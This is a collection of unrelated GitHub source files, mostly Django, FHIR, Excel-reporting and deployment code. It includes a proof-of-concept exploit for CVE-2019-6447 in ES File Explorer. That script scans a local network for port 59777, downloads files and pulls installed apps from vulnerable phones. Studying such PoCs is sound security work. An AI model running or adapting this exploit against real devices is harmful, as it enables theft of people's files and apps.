a0492b3c64aec3811c6644f1b4ea321bfb7ad35d | 49c83faa47be183499d5264e2e7aacfce460fcee | /felipetio/settings/production.py | 2018f6dd5e6cfed7dcef7fc05a0cbe896060d70c | [] | no_license | felipetio/felipetio | 0a4b912f28101baecdc4db9610732527d291638c | f881745dfa30e546e82e6283ca4f79f3a1d6f307 | refs/heads/main | 2022-02-01T01:53:07.812028 | 2022-01-12T15:03:56 | 2022-01-12T15:03:56 | 145,920,124 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 113 | py | from .base import *
DEBUG = False
ALLOWED_HOSTS = ["felipetio.herokuapp.com", "felipet.io", "www.felipet.io"]
| [
"me@felipet.io"
] | me@felipet.io |
212ff7bb2d292acfcdecc48ba1e36050aa9e18ed | 7b02411227428bb746e7622736dc006ee24ca925 | /fhirclient/models/practitioner.py | a031183a9a28ca6bf7c19c5f0c4696218a018c6b | [] | no_license | NCATS-Tangerine/CPKG | 81c74abaec8de75ad769724e84d893dec117cf97 | 92b6079d61bdb975a0a4bc08879f56b686ff08ef | refs/heads/master | 2022-12-10T17:55:52.586808 | 2019-08-20T20:19:56 | 2019-08-20T20:19:56 | 202,387,355 | 0 | 0 | null | 2022-12-08T06:01:57 | 2019-08-14T16:29:04 | Python | UTF-8 | Python | false | false | 3,478 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Generated from FHIR 4.1.0-0931132380 (http://hl7.org/fhir/StructureDefinition/Practitioner) on 2019-08-06.
# 2019, SMART Health IT.
import sys
from dataclasses import dataclass
from typing import ClassVar, Optional, List
from .fhirabstractbase import empty_list
from .address import Address
from .attachment import Attachment
from .backboneelement import BackboneElement
from .codeableconcept import CodeableConcept
from .contactpoint import ContactPoint
from .domainresource import DomainResource
from .fhirdate import FHIRDate
from .fhirreference import FHIRReference
from .humanname import HumanName
from .identifier import Identifier
from .period import Period
@dataclass
class PractitionerQualification(BackboneElement):
""" Certification, licenses, or training pertaining to the provision of care.
The official certifications, training, and licenses that authorize or
otherwise pertain to the provision of care by the practitioner. For
example, a medical license issued by a medical board authorizing the
practitioner to practice medicine within a certian locality.
"""
resource_type: ClassVar[str] = "PractitionerQualification"
identifier: Optional[List[Identifier]] = empty_list()
code: CodeableConcept = None
period: Optional[Period] = None
issuer: Optional[FHIRReference] = None
def elementProperties(self):
js = super(PractitionerQualification, self).elementProperties()
js.extend([
("identifier", "identifier", Identifier, True, None, False),
("code", "code", CodeableConcept, False, None, True),
("period", "period", Period, False, None, False),
("issuer", "issuer", FHIRReference, False, None, False),
])
return js
@dataclass
class Practitioner(DomainResource):
""" A person with a formal responsibility in the provisioning of healthcare or
related services.
A person who is directly or indirectly involved in the provisioning of
healthcare.
"""
resource_type: ClassVar[str] = "Practitioner"
identifier: Optional[List[Identifier]] = empty_list()
active: Optional[bool] = None
name: Optional[List[HumanName]] = empty_list()
telecom: Optional[List[ContactPoint]] = empty_list()
address: Optional[List[Address]] = empty_list()
gender: Optional[str] = None
birthDate: Optional[FHIRDate] = None
photo: Optional[List[Attachment]] = empty_list()
qualification: Optional[List[PractitionerQualification]] = empty_list()
communication: Optional[List[CodeableConcept]] = empty_list()
def elementProperties(self):
js = super(Practitioner, self).elementProperties()
js.extend([
("identifier", "identifier", Identifier, True, None, False),
("active", "active", bool, False, None, False),
("name", "name", HumanName, True, None, False),
("telecom", "telecom", ContactPoint, True, None, False),
("address", "address", Address, True, None, False),
("gender", "gender", str, False, None, False),
("birthDate", "birthDate", FHIRDate, False, None, False),
("photo", "photo", Attachment, True, None, False),
("qualification", "qualification", PractitionerQualification, True, None, False),
("communication", "communication", CodeableConcept, True, None, False),
])
return js | [
"solbrig@jhu.edu"
] | solbrig@jhu.edu |
2b8dd5bdb40140038d3c5cfc75768d15b7d1ebe5 | 61a88248ddc7adb5036d1bb6b9892ae27d1934bb | /CVE-2019-6447_ESFileExplorer/sun.py | 19bea5499c448e560e4bbc8808a50630cd5c2008 | [] | no_license | sunSUNQ/Java_learning | 146e547da90adf7056cdf49888caddaa30644d78 | 4e10e00c8bd0fa6f24ced1a36eef327f379fa25c | refs/heads/master | 2022-04-30T04:40:05.517594 | 2022-04-06T12:37:54 | 2022-04-06T12:37:54 | 176,905,685 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,643 | py | import json
import optparse
import requests
import sys
from socket import *
verbose = True
def sanitize_json(json):
json = json.replace("\'", "\"")
json = json.split('[')[1].split(']')[0]
json = json[0:len(json)-6] + "}"
return json
def get_file(addr, filepath):
if verbose:
print('[*] Getting file: ' + filepath + '\n\tfrom: ' + addr)
session = requests.Session()
headers = {"Content-Type": "application/json"}
address = 'http://' + addr + ':59777' + filepath
filename = filepath.rsplit('/', 1)[1]
resp = session.get(address, headers=headers, verify=False)
if verbose:
print('[*] Server responded with: ' + str(resp.status_code))
if resp and resp.status_code == 200:
if verbose:
print('[*] Writing to file: ' + filename)
with open(filename, 'wb') as f:
f.write(resp.content)
def execute_cmd(addr, cmd, package):
if verbose:
print('[*] Executing command: ' + cmd + ' on ' + addr)
session = requests.Session()
headers = {"Content-Type": "application/json"}
address = 'http://' + addr + ':59777'
if package != '':
data = '{ "command":' + cmd + ', "appPackageName":' + package + ' }'
else:
data = '{ "command":' + cmd + ' }'
resp = session.post(address, headers=headers, data=data, verify=False)
if verbose:
print('[*] Server responded with: ' + str(resp.status_code))
if "NameNotFoundException" in resp.text:
print('[!] Package \'' + package + '\' not found!')
return
if cmd not in ('getDeviceInfo', 'appLaunch', 'listAppsSdcard', 'listVideos', 'listFiles'):
text = sanitize_json(resp.text)
else:
text = resp.text
if resp and resp.status_code == 200:
if cmd == 'getAppThumbnail':
if verbose:
print('[*] Getting app thumbnail: ' + package)
with open(package + ".jpg", 'wb') as f:
f.write(resp.content)
elif cmd == 'appPull':
if verbose:
print('[*] Pulling app: ' + package)
with open(package + ".apk", 'wb') as f:
f.write(resp.content)
else:
print(text)
def is_up(addr):
s = socket(AF_INET, SOCK_STREAM)
s.settimeout(1)
if not s.connect_ex((addr, 59777)):
s.close()
return 1
else:
s.close()
def show_available_cmds():
print('')
print('######################')
print('# Available Commands #')
print('######################')
print('')
print('listFiles: List all the files')
print('listPics: List all the pictures')
print('listVideos: List all the videos')
print('listAudios: List all the audio files')
print('listApps: List all the apps installed')
print('listAppsSystem: List all the system apps')
print('listAppsPhone: List all the phone apps')
print('listAppsSdcard: List all the apk files in the sdcard')
print('listAppsAll: List all the apps installed (system apps included)')
print('getDeviceInfo: Get device info. Package name parameter is needed')
print('appPull: Pull an app from the device')
print('appLaunch: Launch an app. Package name parameter is needed')
print('getAppThumbnail: Get the icon of an app. Package name parameter is needed')
print('')
def set_up_menu():
parser = optparse.OptionParser()
parser.add_option('-g', '--get-file',
action="store", dest="filepath",
help="Get file path", default="")
parser.add_option('-c', '--cmd',
action="store", dest="cmd",
help="Command to execute", default="")
parser.add_option('-p', '--pkg',
action="store", dest="package",
help="Package name", default="")
parser.add_option('--ip', '--host',
action="store", dest="host",
help="Target host IP", default="")
parser.add_option('-n', '--network',
action="store", dest="network",
help="Network to scan", default="192.168.0.")
parser.add_option('-v', '--verbose',
action="store_true", dest="verb",
help="Loud stdout")
return parser.parse_args()
def main():
options, _ = set_up_menu()
verbose = options.verb
if len(sys.argv) > 1 and sys.argv[1] == 'list':
show_available_cmds()
elif options.filepath != '' or options.cmd != '':
def scan_host(addr):
if verbose:
print('[*] Checking address: ' + addr)
if is_up(addr):
if verbose:
print('[+] Address is up: ' + addr)
if options.filepath != '':
get_file(addr, options.filepath)
elif options.cmd != '':
execute_cmd(addr, options.cmd, options.package)
if options.host != '':
scan_host(options.host)
else:
for ip in range(0, 255):
scan_host(options.network + str(ip))
else:
print('Usage:')
print('- python3 poc.py list')
print('- python3 poc.py --get-file [filepath]')
print('- python3 poc.py --cmd [cmd]')
print('- python3 poc.py --cmd [cmd] --host [target_host]')
print('- python3 poc.py --cmd [cmd] --network [network]')
print('- python3 poc.py --cmd [cmd] --pkg [package_name]')
print('- python3 poc.py --verbose --cmd [cmd] --pkg [package_name]')
if __name__ == '__main__':
main() | [
"451953080@qq.com"
] | 451953080@qq.com |
5d5aecd5c82c43bb17695dc4f8426397cc2fd056 | d0ddcd54e19f6f8a3702a0ff9611bf2b92092264 | /task5.py | 0715f4c1c9d3c3937c6f79b3a6b59290dff6ad59 | [] | no_license | altynai02/Chapter2-Task5-hackerrank | 60ec80b5ba1e12e221c4bbe47e115e1a3e5c76cf | ca58a85f28b2226d67989c6ec30dafae9ac52c0a | refs/heads/master | 2021-03-12T12:44:09.103786 | 2020-03-11T16:24:33 | 2020-03-11T16:24:33 | 246,622,043 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 183 | py | #Hackerrank Two Strings
def twoStrings(s1, s2):
s1 = set(s1)
s2 = set(s2)
if len(s1.intersection(s2)) == 0:
return "NO"
else:
return "YES"
twoStrings() | [
"altynay.bakytbekova.02@gmal.com"
] | altynay.bakytbekova.02@gmal.com |
5931821dc074aa8a3ba849f7d1c6bb9a74fdb60f | ff7a7ae752a0c4383841f78b384d1d4be24bc90e | /manipulacion3.py | 3c7963e272af0ed3af7b3e0fb8fa418cd086ef25 | [] | no_license | FranciscoJavierVH/Scripts-pyhon-crash-course | 2b779517d995c11a09454259cfcfc0d1922f12ea | 657baaa204a4272dd5ba717728c5b1672de733e1 | refs/heads/master | 2020-05-31T21:56:18.859872 | 2019-06-06T03:57:42 | 2019-06-06T03:57:42 | 190,509,783 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 34 | py | robot = 'nomad'
robot[:3]
#'nom'
| [
"FranciscoJavierVH"
] | FranciscoJavierVH |
0dea1b7908aef2c8f3b06733aae8c79b441e193c | c8ec5f93927b2af2bf662909fcc87662a21d2e6d | /wallet/__init__.py | 8ee19013469e810ec2fefe606217fc9515b2bab0 | [] | no_license | arkadiusznowak1983/python_cryptocurrency | bee0e7b90fa653fa48648c76463545a5c288bc57 | bb4c4fa3fa3d020972f6c7d6810a41ab9e259f15 | refs/heads/master | 2022-12-02T21:02:39.947503 | 2020-08-23T04:51:31 | 2020-08-23T04:51:31 | 270,490,748 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 23 | py | #__all__ = [ "Wallet" ] | [
"arkadiusz.nowak1983@gmail.com"
] | arkadiusz.nowak1983@gmail.com |
f48415a5c7c97a2d46bf446ff65d3dd864d9f6c9 | 4e3964ae68b0ee452b6aa4a24956526b905379c7 | /spec_metod_class.py | 371c182d356a5d2962876aeed6c2ab76fed9ad91 | [] | no_license | alexandervin/Python | 9a9e26234050ee4a640f79dcdddae05b2683616d | 6b989ac232960aebfe30f1927f2c9090850f21a3 | refs/heads/master | 2020-12-21T16:39:16.048358 | 2020-04-03T08:12:41 | 2020-04-04T09:33:11 | 236,492,012 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 575 | py | class Backpak:
def __init__(self, gift=None):
self.content = []
if gift is not None:
self.content.append(gift)
def add(self, item):
self.content.append(item)
print('В рюкзак положили:', item)
def inspect(self):
print('В рюкзаке лежит')
for item in self.content:
print('------', item)
my_backpack = Backpak(gift='ручка')
my_backpack.add(item='ноут')
my_backpack.add(item='зарядка')
my_backpack.add(item='флэшка')
my_backpack.inspect()
| [
"alexander.vinitsky@gmail.com"
] | alexander.vinitsky@gmail.com |
ad8cef6ac7f0d1ea9ccd700614612c7513fbf724 | 035591f566ce5d46c246bb92d7b4e029fd6d16e6 | /OnlineJudges/CodeForces/B. Table Tennis.py | 7e26a07479e1c615a9b21838beac4e2c2dc74ff3 | [] | no_license | EduardoMCF/Competitive-Programming | 92243fa202d5ef592092683879de191e15340dbb | 4f6ff1ffec46a52049257bdd380c2ed29b8672fd | refs/heads/master | 2020-03-25T20:02:00.100212 | 2019-07-20T10:27:34 | 2019-07-20T10:27:34 | 144,111,733 | 0 | 0 | null | 2018-10-31T20:34:19 | 2018-08-09T06:45:25 | Python | UTF-8 | Python | false | false | 400 | py | n,k = map(int,raw_input().split())
e = map(int,raw_input().split())
M = max(e)
if k >= n:print M
else:
for i in xrange(n):
c, a, achou = 0, 1, False
if e[i] == M:
print M
break
while e[i] >= e[i+a]:
if i+a == n:a = 0
a+=1
c+=1
if c == k:
achou=True
break
if achou:
print e[i]
break | [
"eduardo.freitas@ccc.ufcg.edu.br"
] | eduardo.freitas@ccc.ufcg.edu.br |
7284fd4300a654751a4c16e388ff4ca1012d1c03 | 9351264d05177646a8b940aef42d46521e7cdeed | /easyp2p/excel_writer.py | 326ed1718eb257a4be8754fda5b049e8817799d5 | [
"MIT"
] | permissive | mohabouje/easyp2p | aebb919d316d6064345017c90dba02dec57ce25d | 2638afff21f8a0627a78f19ae4ccc3939b5d46e6 | refs/heads/master | 2022-09-24T04:47:42.229297 | 2020-06-05T10:16:29 | 2020-06-05T10:16:29 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,489 | py | # -*- coding: utf-8 -*-
# Copyright (c) 2018-2020 Niko Sandschneider
"""
Module for writing parsed account statements of P2P platforms to Excel.
The combined parsed results of all selected P2P platforms will be written to
an Excel file with three worksheets: daily results, monthly results and total
results for the whole date range.
"""
import calendar
from datetime import date, timedelta
import logging
from typing import Callable, Dict, List, Optional, Sequence, Tuple
import pandas as pd
from PyQt5.QtCore import QCoreApplication
from easyp2p.p2p_signals import Signals
from easyp2p.p2p_parser import P2PParser
_translate = QCoreApplication.translate
logger = logging.getLogger('easyp2p.excel_writer')
DAILY_RESULTS = _translate('excel_writer', 'Daily results')
MONTHLY_RESULTS = _translate('excel_writer', 'Monthly results')
TOTAL_RESULTS = _translate('excel_writer', 'Total results')
# Signals for communicating with the GUI
signals = Signals()
@signals.update_progress
def write_results(
df_result: pd.DataFrame, output_file: str,
date_range: Tuple[date, date]) -> bool:
"""
Function for writing daily, monthly and total investment results to Excel.
Args:
df_result: DataFrame containing parsed account statements for all
selected P2P platforms.
output_file: File name including path where to save the Excel file.
date_range: Date range (start_date, end_date) for which the account
statement was generated.
Returns:
True on success, False on failure.
Raises:
RuntimeError: If date, platform or currency column are missing
in df_result.
"""
# Check if there were any results
if df_result.empty:
logger.info('df_result is empty.')
return False
# Make a copy to prevent changing the original DataFrame
df_result = df_result.copy()
df_result.reset_index(inplace=True)
# Make sure that all index columns are present
for column in [P2PParser.PLATFORM, P2PParser.CURRENCY, P2PParser.DATE]:
if column not in df_result.columns:
raise RuntimeError(
_translate(
'excel_writer', 'Writing results to Excel was not '
f'successful! Column {column} is missing!'))
# Format date column and add month column to DataFrame
df_result[P2PParser.DATE] = pd.to_datetime(
df_result[P2PParser.DATE], format='%Y-%m-%d')
df_result[P2PParser.MONTH] = pd.to_datetime(
df_result[P2PParser.DATE], format='%d.%m.%Y').dt.to_period('M')
# Get daily, monthly and total results
df_daily = _get_daily_results(df_result)
df_monthly = _get_monthly_results(df_result, date_range)
df_total = _get_total_results(df_monthly)
# Write all three DataFrames to Excel
with pd.ExcelWriter(
output_file, datetime_format='DD.MM.YYYY',
engine='xlsxwriter') as writer:
_write_worksheet(writer, DAILY_RESULTS, df_daily)
_write_worksheet(writer, MONTHLY_RESULTS, df_monthly)
_write_worksheet(writer, TOTAL_RESULTS, df_total)
return True
def _get_daily_results(df_result: pd.DataFrame) -> pd.DataFrame:
"""
Get daily results from DataFrame.
Args:
df_result: DataFrame containing parsed account statements for all
selected P2P platforms.
Returns:
DataFrame with the daily results.
"""
df = df_result.copy()
df.drop(columns=P2PParser.MONTH, inplace=True)
df.set_index(
[P2PParser.PLATFORM, P2PParser.CURRENCY, P2PParser.DATE],
inplace=True)
df.sort_index(inplace=True)
return df
def _get_monthly_results(
df_result: pd.DataFrame, date_range: Tuple[date, date]) -> pd.DataFrame:
"""
Get monthly results from DataFrame.
Args:
df_result: DataFrame containing parsed account statements for all
selected P2P platforms.
date_range: Date range for displaying monthly results.
Returns:
DataFrame with the monthly results.
"""
# Define index and columns to aggregate for pivot table
index = [P2PParser.PLATFORM, P2PParser.CURRENCY, P2PParser.MONTH]
pivot_columns = [
column for column in P2PParser.TARGET_COLUMNS
if column in df_result.columns]
df = df_result.pivot_table(
values=pivot_columns, index=index, aggfunc=_get_aggfunc(pivot_columns))
df = _add_months_without_cashflows(df, date_range)
return df
def _get_total_results(df_monthly: pd.DataFrame) -> pd.DataFrame:
"""
Get total results from DataFrame.
Args:
df_monthly: DataFrame containing monthly results.
Returns:
DataFrame with the total results.
"""
# Define index and columns to aggregate for pivot table
index = [P2PParser.PLATFORM, P2PParser.CURRENCY]
pivot_columns = [
column for column in P2PParser.TARGET_COLUMNS
if column in df_monthly.columns]
df_pivot = df_monthly.pivot_table(
values=pivot_columns, index=index, aggfunc=_get_aggfunc(pivot_columns),
dropna=False)
# Create the total row per currency
df_total = df_pivot.reset_index().set_index(P2PParser.CURRENCY)
df_total = df_total.groupby(P2PParser.CURRENCY).sum()
df_total[P2PParser.PLATFORM] = 'Total'
df_total = df_total.reset_index().set_index(
[P2PParser.PLATFORM, P2PParser.CURRENCY])
df = df_pivot.append(df_total, sort=True)
df.dropna(how='all', inplace=True)
return df
def _get_aggfunc(columns: Sequence[str]) -> Dict[str, Callable]:
"""
Returns the aggregation function for building the pivot tables.
All columns except the balance columns will be summed up. For the start
(end) balance columns the first (last) entry per aggregation index will be
used.
Returns:
Dictionary where columns are the keys and the aggregation function are
the values.
"""
aggfunc = dict()
for col in columns:
if col == P2PParser.START_BALANCE_NAME:
aggfunc[col] = lambda x: x.iloc[0]
elif col == P2PParser.END_BALANCE_NAME:
aggfunc[col] = lambda x: x.iloc[-1]
else:
# Only sum up columns with at least one non-NaN value. Otherwise
# NaN columns will be replaced by zeros.
aggfunc[col] = lambda x: x.sum(min_count=1)
return aggfunc
def _add_months_without_cashflows(
df: pd.DataFrame, date_range: Tuple[date, date]) -> pd.DataFrame:
"""
Add a zero line for all months in date_range without cash flows.
Args:
df: DataFrame which should be checked for missing months.
date_range: Date range.
Returns:
Input DataFrame with zero lines appended for each month without
cash flows.
"""
months = get_list_of_months(date_range)
# For each platform/currency combination we expect one row per month
# in date_range
expected_rows = sorted(list(set(
(index[0], index[1], i) for index in df.index for i in range(
len(months)))))
for platform, currency, i in expected_rows:
month = pd.Period(freq='M', year=months[i].year, month=months[i].month)
if (platform, currency, month) not in df.index:
# Only fill columns with non-N/A values
fill_columns = df.loc[platform].dropna(axis=1).columns
df.loc[(platform, currency, month), fill_columns] = 0.
# Zero is not necessarily correct for the balance columns
if {P2PParser.START_BALANCE_NAME,
P2PParser.END_BALANCE_NAME}.issubset(df.columns):
if i > 0:
previous_month = pd.Period(
freq='M', year=months[i - 1].year,
month=months[i - 1].month)
balance = _get_balance_for_months_without_cashflows(
df, platform, currency, previous_month)
else:
balance = _get_balance_for_months_without_cashflows(
df, platform, currency)
df.loc[
(platform, currency, month),
P2PParser.START_BALANCE_NAME] = balance
df.loc[
(platform, currency, month),
P2PParser.END_BALANCE_NAME] = balance
df.sort_index(inplace=True)
return df
def _get_balance_for_months_without_cashflows(
df: pd.DataFrame, platform: str, currency: str,
previous_month: Optional[pd.Period] = None):
if previous_month:
# If month is not the first month look up the correct value in
# previous month's row
balance = (
df.loc[
(platform, currency, previous_month),
P2PParser.END_BALANCE_NAME])
else:
# If month is the first month look up the correct value in the
# first existing month's row. If no month has cash flows assume
# that balance=0.
next_months = [index[2] for index in df.index]
if next_months:
balance = (
df.loc[
(platform, currency, next_months[0]),
P2PParser.START_BALANCE_NAME])
else:
balance = 0
return balance
def get_list_of_months(date_range: Tuple[date, date]) -> List[date]:
"""
Get list of all months in date_range.
Args:
date_range: Date range.
Returns:
List of all months in date_range.
"""
months = []
current_date = date_range[0]
while current_date < date_range[1]:
days_in_month = calendar.monthrange(
current_date.year, current_date.month)[1]
months.append(current_date)
current_date += timedelta(days=days_in_month)
return months
def _write_worksheet(
writer: pd.ExcelWriter, worksheet_name: str, df: pd.DataFrame) -> None:
"""
Write DataFrame to Excel worksheet and format columns.
For each column in the worksheet the width is set to the maximum length
* 1,2 of all entries in the column. For all non-index columns the_format
is set to money_format.
Args:
writer: Handle of pandas ExcelWriter.
worksheet_name: Name of the worksheet where DataFrame should be
saved.
df: DataFrame containing the data to be written to the worksheet.
"""
# Rounds results to 2 digits, sort columns and fill in missing values
df = df.round(2)
df = df[[
column for column in P2PParser.TARGET_COLUMNS
if column in df.columns]]
df.fillna('N/A', inplace=True)
# Define format for currency columns
workbook = writer.book
money_format = workbook.add_format({'num_format': '#,##0.00'})
df.to_excel(writer, worksheet_name)
# Format cells and set column widths
worksheet = writer.sheets[worksheet_name]
index_length = len(df.index.names)
df = df.reset_index()
for index, col in enumerate(df.columns):
# Get length of header and longest data entry
header_length = len(col)
data_length = df[col].map(lambda x: len(str(x))).max()
if index < index_length:
worksheet.set_column(
index, index, max(header_length, data_length) * 1.2)
else:
worksheet.set_column(
index, index, max(header_length, data_length) * 1.2,
money_format)
| [
"info@ceystyle.de"
] | info@ceystyle.de |
5e9f086b3ccb094d9cb17200c2359b059c27f5a1 | e2017e4faa661c13bfeb6ee6f4b3196531555bdd | /polls/migrations/0001_initial.py | 0f0d7838730d614c476b6fb7b9972de37de0d6c5 | [] | no_license | kchar808/mysite | a05a31516846a4537c25e51366c50d7ef6d27fc3 | 721fdf827cf026d15b2b5822eea02ba2ff68526c | refs/heads/master | 2022-04-07T15:35:27.378608 | 2020-01-12T03:49:38 | 2020-01-12T03:49:38 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,075 | py | # Generated by Django 3.0.2 on 2020-01-09 02:41
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Question',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('question_text', models.CharField(max_length=200)),
('pub_date', models.DateTimeField(verbose_name='date published')),
],
),
migrations.CreateModel(
name='Choice',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('choice_text', models.CharField(max_length=200)),
('votes', models.IntegerField(default=0)),
('question', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='polls.Question')),
],
),
]
| [
"keelanachar@gmail.com"
] | keelanachar@gmail.com |
168bf31505f3734798a9e55c48d2ab1a8755243b | f876ec2849956c52082aa43d12241850c5942a3b | /dashboard/forms.py | a4e676500cdb13813f887f6c63d898b6bf07e099 | [] | no_license | osdesignweb-company/dsc_v2 | 6afce7d674f1168e017fc0a716dcdf589bf46b12 | d2709841ffb9a6d34fde5a10e08d86863df98edb | refs/heads/master | 2020-04-14T09:52:15.984790 | 2019-01-21T17:00:14 | 2019-01-21T17:00:14 | 163,771,570 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,023 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django import forms
from django.contrib.auth import get_user_model
from django.views.generic.edit import UpdateView
from django.urls import reverse
from builtins import super
class UserCreationForm(forms.ModelForm):
# id_persona = forms.CharField(widget=forms.TextInput(attrs={'placeholder': 'N° Documento'}))
nombre = forms.CharField(required=True)
primer_apellido = forms.CharField(required=True)
password1 = forms.CharField(label='Password', min_length=8, widget=forms.PasswordInput)
password2 = forms.CharField(label='Password confirmation', min_length=8, widget=forms.PasswordInput)
class Meta:
model = get_user_model()
fields = ('id_persona','nombre','primer_apellido','segundo_apellido',
'tipo_documento','rol','sexo','correo','celular','telefono',
'pais_nacimiento','imagen','fecha_nacimiento',
)
def clean_password2(self):
# Check that the two password entries match
password1 = self.cleaned_data.get("password1")
password2 = self.cleaned_data.get("password2")
if password1 and password2 and password1 != password2:
raise forms.ValidationError("Contraseñas no coinciden")
return password2
def save(self, commit=True):
# Save the provided password in hashed format
user = super().save(commit=False)
user.set_password(self.cleaned_data["password1"])
if commit:
user.save()
return user
class UserUpdateForm(forms.ModelForm):
class Meta:
model = get_user_model()
fields = (
'id_persona','nombre','primer_apellido','segundo_apellido',
'tipo_documento','rol','sexo','correo','celular','telefono',
'pais_nacimiento','imagen','fecha_nacimiento',
)
def save(self, commit=True):
user = super().save(commit=False)
if commit:
user.save()
return user | [
"sabnq@hotmail.com"
] | sabnq@hotmail.com |
91b92aca71f5a39a7f0825e9c4feb052b3573455 | f5baae2f56a22d6e7b23b121eae1dd4751564101 | /Embedded/Satellite/VideoStreamEmbedded.py | f03bac2f3e4c55c73d77eb9810fb20b0685203be | [] | no_license | BaekCHO/Embedded | 50d673a0cead437114e0a0ecf6733dd2ec5351b3 | 164fe732acf0d8b6bb76688f9855e06f24fa1404 | refs/heads/master | 2016-09-13T21:12:58.926047 | 2016-06-12T01:37:24 | 2016-06-12T01:37:24 | 57,861,475 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,076 | py | import cv2, cv
import socket
import threading
import time
import TotalFunc
sendImg = ""
def getPhoto():
global sendImg
cam = cv2.VideoCapture(0)
cam.set(cv.CV_CAP_PROP_FRAME_WIDTH, 320)
cam.set(cv.CV_CAP_PROP_FRAME_HEIGHT, 240)
while True:
ret, img = cam.read()
sendImg = cv2.imencode(".jpeg", img)[1].tostring()
key = cv2.waitKey(10)
def sendPhoto():
global sendImg
port = 8000
while True:
s = socket.socket()
s.connect(("113.198.235.230", port))
# print "Sending..."
s.send(sendImg)
s.send(str(TotalFunc.temp))
s.send(str(TotalFunc.high))
s.send(str(TotalFunc.altitude))
# print "Sending is finished"
sendImg = ""
s.close()
if __name__ == "__main__":
#try:
th = threading.Thread(target = getPhoto)
th.start()
th2 = threading.Thread(target = sendPhoto)
th2.start()
th3 = threading.Thread(target = TotalFunc.save_Video)
th3.start()
th4 = threading.Thread(target = TotalFunc.mix_Db_Measure)
th4.start()
th5 = threading.Thread(target = TotalFunc.find_Gps)
th5.start()
#finally
#TotalFunc.db_Select()
#create_Graph()
| [
"noreply@github.com"
] | BaekCHO.noreply@github.com |
b767dc6912417be37cab9363e2fe281e20c8e20d | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/nouns/_lookouts.py | 435d7553390587072a7651b0c3278816d229a48a | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 245 | py |
from xai.brain.wordbase.nouns._lookout import _LOOKOUT
#calss header
class _LOOKOUTS(_LOOKOUT, ):
def __init__(self,):
_LOOKOUT.__init__(self)
self.name = "LOOKOUTS"
self.specie = 'nouns'
self.basic = "lookout"
self.jsondata = {}
| [
"xingwang1991@gmail.com"
] | xingwang1991@gmail.com |
78071721fe276178f2b4e561bfc8ddeb56ab6e32 | a71b1c2cf1ff5b4d8bb781af7c550d4389550553 | /miwc/urls.py | 2ad48a1191f3e52976970b6200e30c2f9fc9baf2 | [] | no_license | water1e6/miwc | c9caff26f20f4fbf57ae82605e9bb31c66a0b27f | 0e238dd4532ff9e46a7be4ab7160e88a3ba423fc | refs/heads/master | 2021-03-30T18:31:57.090431 | 2016-01-11T07:16:59 | 2016-01-11T07:16:59 | 24,247,602 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 586 | py | from django.conf.urls import patterns, include, url
# Uncomment the next two lines to enable the admin:
from django.contrib import admin
urlpatterns = [
# Examples:
# url(r'^miwc/', include('miwc.foo.urls')),
# Uncomment the admin/doc line below to enable admin documentation:
# url(r'^admin/doc/', include('django.contrib.admindocs.urls')),
# url(r'^site/', include('website.urls', namespace="site")),
# Uncomment the next line to enable the admin:
url(r'^admin/', include(admin.site.urls)),
url(r'^$', include('website.urls', namespace='site')),
] | [
"shane@mercerislandwater.com"
] | shane@mercerislandwater.com |
1288d48538f1f10e128e1a615ca9175f62cd2f1f | ea1ec2d938d4b76d6dd83d28a66963dd504e99d5 | /deployment_pipeline/app.py | 8e5f19f222aad470ffcc8ae26102af2c530d11d1 | [
"MIT-0"
] | permissive | DavidykZhao/amazon-sagemaker-drift-detection | 7046a7102e1d45334fa56bda1c8adb22c0c481c7 | 3eb7af7ee0923f76a9900bea0eace2da7d6be8a9 | refs/heads/main | 2023-08-22T05:37:26.964116 | 2021-09-17T03:57:32 | 2021-09-17T03:57:32 | 411,586,937 | 0 | 0 | MIT-0 | 2021-09-29T08:15:02 | 2021-09-29T08:15:01 | null | UTF-8 | Python | false | false | 4,751 | py | #!/usr/bin/env python3
import argparse
import json
import logging
import os
from aws_cdk import core
from infra.deployment_config import DeploymentConfig, VariantConfig
from infra.sagemaker_stack import SageMakerStack
from infra.model_registry import ModelRegistry
# Configure the logger
logger = logging.getLogger(__name__)
logging.basicConfig(level="INFO")
registry = ModelRegistry()
def create_endpoint(
app: core.App,
project_name: str,
project_id: str,
sagemaker_execution_role: str,
artifact_bucket: str,
stage_name: str,
):
# Define variables for passing down to stacks
endpoint_name = f"sagemaker-{project_name}-{stage_name}"
if len(endpoint_name) > 63:
raise Exception(
f"SageMaker endpoint: {endpoint_name} must be less than 64 characters"
)
logger.info(f"Create endpoint: {endpoint_name}")
# Define the deployment tags
tags = [
core.CfnTag(key="sagemaker:deployment-stage", value=stage_name),
core.CfnTag(key="sagemaker:project-id", value=project_id),
core.CfnTag(key="sagemaker:project-name", value=project_name),
]
# Get the stage specific deployment config for sagemaker
with open(f"{stage_name}-config.json", "r") as f:
j = json.load(f)
deployment_config = DeploymentConfig(**j)
# Set the model package group to project name
package_group_name = project_name
# If we don't have a specific champion variant defined, get the latest approved
if deployment_config.variant_config is None:
logger.info("Selecting latest approved")
